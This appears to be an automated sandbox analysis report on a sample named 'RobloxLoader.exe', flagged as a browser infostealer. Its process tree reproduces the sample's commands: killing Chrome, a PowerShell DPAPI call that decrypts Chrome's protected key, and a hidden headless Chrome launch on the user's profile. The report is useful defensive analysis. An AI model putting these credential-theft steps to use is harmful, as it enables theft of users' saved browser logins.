Analysis

  • max time kernel
    63s
  • max time network
    68s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    27-10-2024 16:44

General

  • Target

    RobloxLoader.exe

  • Size

    36.9MB

  • MD5

    c1f06056c5480224c8f4139028ca5f8e

  • SHA1

    aa32bc3480ce763e720d47c2a47907df47f930b0

  • SHA256

    4d9b1a73f95cc6a00e7f2cd032c4f877fc15bf66d4f6ec9b61b18e37e791750f

  • SHA512

    f8289ebd899772487dc3a3cddd1d69ca8bbc30526c946b8a1fe910cfcfb18335847008b521c228d0dd522d619e65c43cbf4a87cf81492f96550511a13edef10b

  • SSDEEP

    393216:qQgHDlanaGBXvDKtz+bhPWES4tiNQPNrIKc4gaPbUAgrO4mgl96l+ZArYsFRlPy9:q3on1HvSzxAMNlFZArYsX1Ys3WL/

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Kills process with taskkill 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 45 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\RobloxLoader.exe
    "C:\Users\Admin\AppData\Local\Temp\RobloxLoader.exe"
    1⤵
    • Checks computer location settings
    • Loads dropped DLL
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2160
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic logicaldisk get name"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1848
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic logicaldisk get name
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1816
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM chrome.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:664
      • C:\Windows\system32\taskkill.exe
        taskkill /F /IM chrome.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1988
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,2,142,118,8,95,31,118,64,160,100,56,129,213,73,187,252,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,233,113,106,0,247,215,176,4,214,100,69,24,12,82,184,99,251,48,99,62,224,63,15,20,29,91,157,107,67,169,249,96,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,252,121,179,237,157,205,101,66,46,197,237,84,78,146,147,24,228,86,99,11,181,9,197,187,81,221,135,249,220,177,151,54,48,0,0,0,201,32,108,188,0,214,238,125,56,14,128,232,126,3,179,153,60,210,117,251,33,154,83,61,107,79,102,158,116,82,197,193,171,143,252,200,195,47,26,56,146,47,159,112,126,10,213,222,64,0,0,0,126,107,51,243,210,113,53,220,214,140,169,196,68,149,197,199,57,133,144,71,163,241,191,42,246,87,185,8,107,45,47,241,156,235,130,58,10,186,143,102,250,211,197,126,173,68,108,167,40,14,195,38,121,76,232,215,128,91,229,33,134,94,213,207), $null, 'CurrentUser')"
      2⤵
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:3584
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,2,142,118,8,95,31,118,64,160,100,56,129,213,73,187,252,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,233,113,106,0,247,215,176,4,214,100,69,24,12,82,184,99,251,48,99,62,224,63,15,20,29,91,157,107,67,169,249,96,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,252,121,179,237,157,205,101,66,46,197,237,84,78,146,147,24,228,86,99,11,181,9,197,187,81,221,135,249,220,177,151,54,48,0,0,0,201,32,108,188,0,214,238,125,56,14,128,232,126,3,179,153,60,210,117,251,33,154,83,61,107,79,102,158,116,82,197,193,171,143,252,200,195,47,26,56,146,47,159,112,126,10,213,222,64,0,0,0,126,107,51,243,210,113,53,220,214,140,169,196,68,149,197,199,57,133,144,71,163,241,191,42,246,87,185,8,107,45,47,241,156,235,130,58,10,186,143,102,250,211,197,126,173,68,108,167,40,14,195,38,121,76,232,215,128,91,229,33,134,94,213,207), $null, 'CurrentUser')
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5088
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM chrome.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3184
      • C:\Windows\system32\taskkill.exe
        taskkill /F /IM chrome.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1384
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory="Default" --headless --window-position=-10000,-10000
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4600
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff97478cc40,0x7ff97478cc4c,0x7ff97478cc58
        3⤵
          PID:2820
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --field-trial-handle=1436,i,10202923576128820199,12732699221550718157,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1428 /prefetch:2
          3⤵
            PID:1052
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --field-trial-handle=1752,i,10202923576128820199,12732699221550718157,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1748 /prefetch:3
            3⤵
              PID:4236
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --allow-pre-commit-input --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --field-trial-handle=1788,i,10202923576128820199,12732699221550718157,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1780 /prefetch:1
              3⤵
              • Drops file in Program Files directory
              PID:1532

Network

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5s1500yk.rtf.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node

    Filesize

    1.8MB

    MD5

    66a65322c9d362a23cf3d3f7735d5430

    SHA1

    ed59f3e4b0b16b759b866ef7293d26a1512b952e

    SHA256

    f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c

    SHA512

    0a44d12852fc4c74658a49f886c4bc7c715c48a7cb5a3dcf40c9f1d305ca991dd2c2cb3d0b5fd070b307a8f331938c5213188cbb2d27d47737cc1c4f34a1ea21

  • C:\Users\Admin\AppData\Roaming\node_sqlite3.node

    Filesize

    274KB

    MD5

    7cbb230781b09f0543c935ce1d17dad0

    SHA1

    84d30df3dd76a7bd50ce54ae461277002abd619e

    SHA256

    90d39ca6189c82070a36a8f7784fb44578d05ba4c043ba42d254b76bcfe47a4d

    SHA512

    14a9964bbde4e2c05077bfabb518a99e6108fb3dc4acc69905fbfa2f295b119edfdd3f758d8913fd1faac96c18c90e6b97cc14568e931d0732e8b1a24e5d5fdf

  • memory/5088-82-0x0000011F57E90000-0x0000011F57EB2000-memory.dmp

    Filesize

    136KB

  • memory/5088-83-0x0000011F582A0000-0x0000011F582F0000-memory.dmp

    Filesize

    320KB